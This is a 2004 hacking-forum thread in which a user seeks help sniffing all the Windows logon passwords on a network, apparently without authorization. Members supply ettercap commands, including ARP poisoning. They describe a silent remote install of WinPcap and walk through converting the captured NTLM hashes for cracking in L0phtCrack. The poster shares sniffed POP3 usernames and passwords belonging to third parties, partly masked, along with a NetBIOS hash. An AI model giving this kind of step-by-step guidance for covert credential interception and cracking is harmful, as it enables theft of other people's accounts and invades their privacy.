XeLoRy
Jun 25 2004, 11:14 PM
does anyone have a good command-line password sniffer to tell me ? i want to sniff the logon password to get all windows users's password of a network but i can t find any good command line sniffer... passed about 2 hours to search and test all sort of sniffers on google but without success  some help needed, thx  (sorry for bad english)
talaxian
Jun 26 2004, 12:34 AM
XeLoRy
Jun 26 2004, 08:24 AM
yeah, thank you very much man, but with what can I compile that ?
nuorder
Jun 26 2004, 08:48 AM
two other command line sniffers - already compiled
tethereal, which is part of the ethereal package
www.ethereal.com
dsniff
www.datanerds.net/~mike/dsniff.html
XeLoRy
Jun 26 2004, 09:44 AM
thx nuorder, i ve download ethereal and installed it but it s a GUI program but i suppose there is a command line executable included when it is installed so i want to know if it is tethereal.exe ??? when i start it there is a dos window mentionning it : Capturing on \Device\NPF_GenericNdisWanAdapter 0.000000 50:bd:20:52:41:53 -> Locate-Directory-Server LLC U, func=UI; DSAP LLC Sub-Layer Management Group, SSAP LLC Sub-Layer Management Command and then hold on... what i have to do with my lan to sniff ? just start this executable and wait ? where are stored the password finded ? a little help plz 
strasharo
Jun 26 2004, 11:03 AM
Xelory, look here https://sourceforge.net/project/showfiles.php?group_id=17435This is the sourceforge repository,where you can find compiled ettercap. Hope that this will help you. Have a nice day. 
nuorder
Jun 26 2004, 11:11 AM
yeh probly better off with ettercrap it supports password sniffing, the other sniffers are good but you have to extract the data manually - its fun! but time consuming lol
edit: just had a better look at ettercap features its got a nice set of password features.. this requires time
XeLoRy
Jun 26 2004, 08:36 PM
thx all but :
| CODE |
26/06/2004 22:34 <DIR> .
26/06/2004 22:34 <DIR> ..
30/01/2003 22:34 382.976 cygcrypto-0.9.7.dll
10/07/2003 21:11 284.672 cygcrypto.dll
30/01/2003 22:34 79.360 cygssl-0.9.7.dll
10/07/2003 21:11 74.240 cygssl.dll
10/07/2003 21:11 398.664 cygwin1.dll
10/07/2003 21:11 109.568 ettercap.exe
6 fichier(s) 1.329.480 octets
2 Rép(s) 8.817.119.232 octets libres
C:\TOOLZ\ettercap>ettercap
C:\TOOLZ\ettercap> |
it doesnt do anything, is it normal ? and when i list my process i can t find ettercap running  what s the problem ?
FiNaLBeTa
Jun 26 2004, 08:46 PM
cain and abel ,oxit.it
XeLoRy
Jun 26 2004, 08:52 PM
but cain and abel are GUI snifferz, and i want a command line sniffer
FiNaLBeTa
Jun 26 2004, 09:12 PM
| QUOTE (XeLoRy @ Jun 26 2004, 08:52 PM) | | but cain and abel are GUI snifferz, and i want a command line sniffer |
cain is, abel is te remote version. never tested it myself, but if it works like cain, it's a winner.
XeLoRy
Jun 26 2004, 09:35 PM
hum, dont know that, why not, i will test and tell you what
strasharo
Jun 26 2004, 10:58 PM
Xelory,i had the same problem with ettercap,and in mine case,the problem was in winpcap.I had the latest WinPcap installed (>3.0) and ettercap just doesn`t started without any error.If you have the latest winpcap installed just uninstall it,reboot and then install winpcap 2.3 that is provided with ettercap.Think that this will fix the issues. Have a nice day.
XeLoRy
Jun 27 2004, 12:02 AM
thx strasharo !!! I ve just deinstalled wincap 3.1 beta and installed 2.3 without a reboot and it works Now i run a : | CODE | C:\TOOLZ\ettercap>ettercap -NCsz
ettercap 0.6.b (c) 2002 ALoR & NaGA
List of available devices :
--> [dev1] - [NdisWan Adapter]
--> [dev2] - [VIA Rhine II Fast Ethernet Adapter]
Please select one of the above, which one ? [0]: 2
Your IP: 10.0.0.1 with MAC: 00:10:DC:97:CC:E4 on Iface: dev2
Loading plugins... Done.
Building host list for netmask 255.255.255.0, please wait...
Resolving 1 hostnames...
* |==================================================>| 100.00 %
Press 'h' for help...
Sniffing (IP based): ANY:0 <--> ANY:0
TCP + UDP packets... (default)
Collecting passwords... |
to collect all the passwords of all the ips on the LAN, but may i have to let it run as it a few time to wait for some passwords ?
i ve done this to log the sniffed traffic to a file :
| CODE | [qQ] - quit
[lL] - log all trafic to file(s)
space - stop/cont sniffing
Logging to file(s)... |
but when are the windows logon session password are sniffed ??? when anybody logon a workstation on the LAN or else ?? need to know it... edit : well i logon a workstation on my LAN while ettercap was in password mode sniffing and i ve got a result in the log file like that : | CODE | decoder Decodedata_MakeConnectionList - new node ! 40 ! T 10.0.0.2:1046 - 10.0.0.1:139
illithid Dissector_StateMachine_SetStatus - (3)! T 10.0.0.1:139 - 10.0.0.2:1043 -- [A250EB921240BB85]
illithid Dissector_StateMachine_SetStatus - (2)! T 10.0.0.2:1043 - 10.0.0.1:139 -- [(null)]
decoder Decodedata_MakeConnectionList - new node ! 41 ! T 10.0.0.1:4343 - **.**.90.88:26999
illithid Dissector_StateMachine_SetStatus - (3)! T 10.0.0.1:139 - 10.0.0.2:1043 -- [AB1C24A794FFCCCC]
decoder Decodedata_MakeConnectionList - new node ! 42 ! T 10.0.0.2:1048 - 10.0.0.1:445
illithid Dissector_StateMachine_SetStatus - (2)! T 10.0.0.2:1043 - 10.0.0.1:139 -- [(null)] |
where 10.0.0.1 is the ettercap pc, and 10.0.0.2 is the just logon(ed) pc... WHERE IS THE PASS ? and second BIG question, how can i install wincap discretely (not by a remote viewer, too lame) on a remote box ? THX FOR HELP
nuorder
Jun 27 2004, 03:30 AM
works fine with winpcap version 3.0 (not 3.1) for me
run "ettercap -NCLzs" to sniff for passwords thay are going to/from your machine from anyone. the L is for a logfile, which is stored in the ettercap directory
read the pdf that came with ettercap for instructs on how to arp poison if you need to do that
eg: "ettercap -NCza -D 100 192.168.0.1 192.168.0.2 55:23:A5:B4:C7:89 00:A3:56:FE:4F:6D"
when testing make sure that the host that is try to connect to you doesnt already have the login password cached otherwise it may not send it so you wont see anything.
as for installing winpcap silently there is one you can download off their site
winpcap.polito.it/install/default.htm | QUOTE | Transparent installation
This file installs WinPcap silently, without making the installation screen appearing and without any user intervention |
XeLoRy
Jun 27 2004, 10:22 AM
| QUOTE | | when testing make sure that the host that is try to connect to you doesnt already have the login password cached otherwise it may not send it so you wont see anything. |
what do you mean by "cached login" ??? ----------------------------------------------------------------------------------------------- well, i ve installed all it needed on the remote box but i have still a important question | CODE | �[01m�[1mettercap 0.6.b © 2002 ALoR & NaGA�[0m
List of available devices :
--> [dev0] - [NDIS 5.0 driver]
--> [dev2] - [NdisWan Adapter]
--> [dev3] - [NdisWan Adapter]
--> [dev4] - [NdisWan Adapter]
--> [dev5] - [NdisWan Adapter]
--> [dev6] - [NdisWan Adapter]
--> [dev7] - [NdisWan Adapter]
Please select one of the above, which one ? [0]: |
how can i know which one adapter is the ethernet one activated in the control panel of network connections???
i ve been into and seen a Realtek adapter... but which one of this five is the good ?
nuorder
Jun 27 2004, 02:44 PM
| QUOTE | | what do you mean by "cached login" ??? |
if you are accessing resources remotely and tick the "save password" box then next time it may not pick up on the credentials as windows already knows about the login
| QUOTE | | how can i know which one adapter is the ethernet one activated in the control panel of network connections??? |
try them all, start at 0 as thats the most probable
XeLoRy
Jun 27 2004, 03:17 PM
yes, thx, the 0 is the good one i ve run a ettercap -NCLsz and now i m waiting for a logon password in the log file i hope it will work... edit : huhuhu | CODE | 11:10:42 10.0.1.8:3046 <--> ***.15.97.147:110 pop3
USER: *speiriii@*********.net
PASS: lzz
11:12:33 10.0.1.103:1740 <--> ***.15.97.147:110 pop3
USER: *speir@*********.net
PASS: walton |
edit2 : how can i active the ACTIVE PROTOCOL DISSECTION in a ARPBased sniff ?? to spy the SSL traffic ? i read it in the doc but they don t show how to active it ...
edit3 : SHIT ! i have this msg in log file since few minutes :
| CODE | ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [60]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494]
ettercap Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494] |
and it s continue like that about 100 lines what must i do ? restart the sniffing ? edit4 : well i ve restarted that shit and now i ve got a new sniffed password but i can t understand where is the user login and where is the pass : | CODE | 11:27:41 10.0.1.105:1701 <--> 10.0.1.3:139 netbios-ssn
USER: \FALCON\IPC$
PASS:
LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000 |
need help
Metathron
Jun 27 2004, 04:13 PM
| QUOTE |
11:27:41 10.0.1.105:1701 <--> 10.0.1.3:139 netbios-ssn
USER: \FALCON\IPC$
PASS:
LC 2.5 FORMAT: "USER& quot;:3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E
646F777320342E300004FF00000002000100130000
|
well so far as i know its the hash ... now you have to crack it with LC4 / 5 or anything else and then you will have the password
XeLoRy
Jun 27 2004, 04:25 PM
| CODE | | LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000 |
yes i ve understand it but i don t know this format of hash, it appears that it s the format of LC 2.5 ... possible ? but we are at the 4 and 5 version ... my question is : what s the LC4 format of this hash ? and then i will crack it as usual O:-)
strasharo
Jun 27 2004, 04:51 PM
There is a file called lc-converter.c in the dir share,which comes with ettercap.It`s a converter that converts these hashes in LC 4.0 format.
| QUOTE |
/*
ettercap -- L0pht crack converter form ettercap log to LC 4.0
|
That`s it. Have a nice day.
Metathron
Jun 27 2004, 04:56 PM
Wow nice thanks hmm my system is fresh and i must find first the Visual Basic CD  can you upload please if it is possible the compiled version ? Meta edit1:\\ already compiled now but im not able as trial member to upload files sorry edit2:\\ ive tested the compiler my input file was ----------------------------- USER: \FALCON\IPC$ PASS: LC 2.5 FORMAT: "USER& quot;:3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E 646F777320342E300004FF00000002000100130000 ----------------------------- output file was then : ----------------------------- \FALCON\IPC$:"":"& quot;:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E30000 4FF00000002000100130000:479EE3535736FACB ----------------------------- well but what i must choose in lc5 ... Import from PWDump file ? when i choose PWDump file ... it brute only some secons not the right bruteforcing and when i choose Unix shadow file it want to brute 650 Days  so please what should i do
strasharo
Jun 27 2004, 05:40 PM
Here is the compiled converter.
XeLoRy
Jun 27 2004, 06:14 PM
well, i ve put this line in a txt file called 1.txt :
| CODE | | "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000 |
then i ve tried to convert with the lc-converter by this command :
| CODE | | c:\toolz\lcconverter\lc-converter 1.txt 2.txt |
but i ve nothing in my 2.txt .... why ???
Metathron
Jun 27 2004, 06:30 PM
read my post and you will find the answer
you need the full log
USER: \FALCON\IPC$
PASS:
LC 2.5 FORMAT: "USER& quot;:3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E
646F777320342E300004FF00000002000100130000
well but what i must choose in lc5 ... Import from PWDump file ?
when i choose PWDump file ... it brute only some secons not the right bruteforcing
and when i choose Unix shadow file it want to brute 650 Days
so please what should i do
XeLoRy
Jun 27 2004, 08:35 PM
hum, i ve done what you said but in my 2.txt i ve got this line :
| CODE | | \FALCON\IPC$:"":"":0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000:479EE3535736FACB |
and when i import the file in LC4 by import pwdump file option, the username to crack is \FALCON\IPC$ .... it s not the login to crack ? isn't it ?
anyone to explain me ?
g33k
Jun 28 2004, 06:49 AM
hi all, how about using DaSniff? It works well with WinPCAP and well as Win2K native interface. You can use expressions in rules to capture the traffic. Try Goodgle to get it. Also try Natas. the sniffer for Win2k regards, g33k
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
